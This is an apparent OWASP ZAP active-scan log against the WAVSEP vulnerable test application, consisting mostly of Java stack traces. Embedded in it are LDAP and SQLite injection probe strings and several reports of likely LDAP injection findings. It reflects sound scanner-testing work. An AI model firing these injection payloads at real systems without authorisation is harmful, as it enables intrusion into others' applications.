http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11043652 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11044053 [ZAP-ActiveScanner-0] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: '172.17.0.2' java.lang.IllegalStateException: unsupported protocol: '172.17.0.2' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:208) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11044054 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:208) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11044258 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11044505 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 11044505 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - A likely LDAP injection vulnerability has been found with [POST] URL [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-POST-302Redirect/Case10-Redirect-RedirectMethod-FilenameContext-HttpInputValidation-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp] on parameter [target], using [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-POST-302Redirect/none892j3kd.txt)(objectClass=*] to simulate a logically equivalent condition, and using [crsk94fxynqzuwsijuvxkhcdayrxcb951b92xx1ugm63rg3iqn9aendsjj6iu03hdbr0h7fb16yt1t1t1ea0dmvpqcop6ylvrhpctj1z3i8131f4sdh6qp84] to simulate a FALSE condition. 11044660 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11044858 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:208) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11045061 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11045062 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11046872 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11049519 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 11049519 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - A likely LDAP injection vulnerability has been found with [GET] URL [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-JavaScript-Detection-Evaluation-GET-200Valid/Case10-Redirect-RedirectMethod-FilenameContext-HttpInputValidation-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-JavaScript-Detection-Evaluation-GET-200Valid/none892j3kd.txt] on parameter [target], using [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-JavaScript-Detection-Evaluation-GET-200Valid/none892j3kd.txt)(objectClass=*] to simulate a logically equivalent condition, and using [blq1e4dz7tayzn8wsot5vp3swvpfvup1xlovaodszxmlqn4gh6rqyp348duakhnv543t8u75xtip0suq09no1tfdgf5tncwgrlrze7gla573ubeqooekcycfcpddc90] to simulate a FALSE condition. 11051129 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 11051129 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - A likely LDAP injection vulnerability has been found with [POST] URL [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-JavaScript-Detection-Evaluation-POST-200Valid/Case10-Redirect-RedirectMethod-FilenameContext-HttpInputValidation-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp] on parameter [target], using [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-JavaScript-Detection-Evaluation-POST-200Valid/none892j3kd.txt)(objectClass=*] to simulate a logically equivalent condition, and using [z7a4tygslihg3gnfzdi7vcegesxwr8uy260ctlcsza9j09etw97eiryx66w0k4x7ymeqvq0bkjh8kswlbtaijfmwfcw8edktvw96dtp9wsl1q1gwgdcp8y1g9du6zafn] to simulate a FALSE condition. 11054096 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | LDAPInjection in 176.489s 11054096 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SQLInjectionSQLite strength LOW threshold MEDIUM 11078012 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities java.net.SocketException: Connection reset at java.net.SocketInputStream.read(SocketInputStream.java:196) at java.net.SocketInputStream.read(SocketInputStream.java:122) at java.io.BufferedInputStream.fill(BufferedInputStream.java:235) at java.io.BufferedInputStream.read(BufferedInputStream.java:254) at org.apache.commons.httpclient.HttpParser.readRawLine(HttpParser.java:78) at org.apache.commons.httpclient.HttpParser.readLine(HttpParser.java:106) at org.apache.commons.httpclient.HttpConnection.readLine(HttpConnection.java:1116) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.readLine(MultiThreadedHttpConnectionManager.java:1413) at org.apache.commons.httpclient.HttpMethodBase.readStatusLine(Unknown Source) at org.zaproxy.zap.ZapGetMethod.readResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.execute(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11103152 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 11103152 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 11103157 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 11105005 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 11105007 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 11159192 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11175186 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/case randomblob(100000) when not null then 1 else 1 end at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:371) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 11215292 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite - An error occurred checking a url for SQLite SQL Injection vulnerabilities java.lang.IllegalStateException: unsupported protocol: '172.17.0.2' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.SQLInjectionSQLite.scan(SQLInjectionSQLite.java:302) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 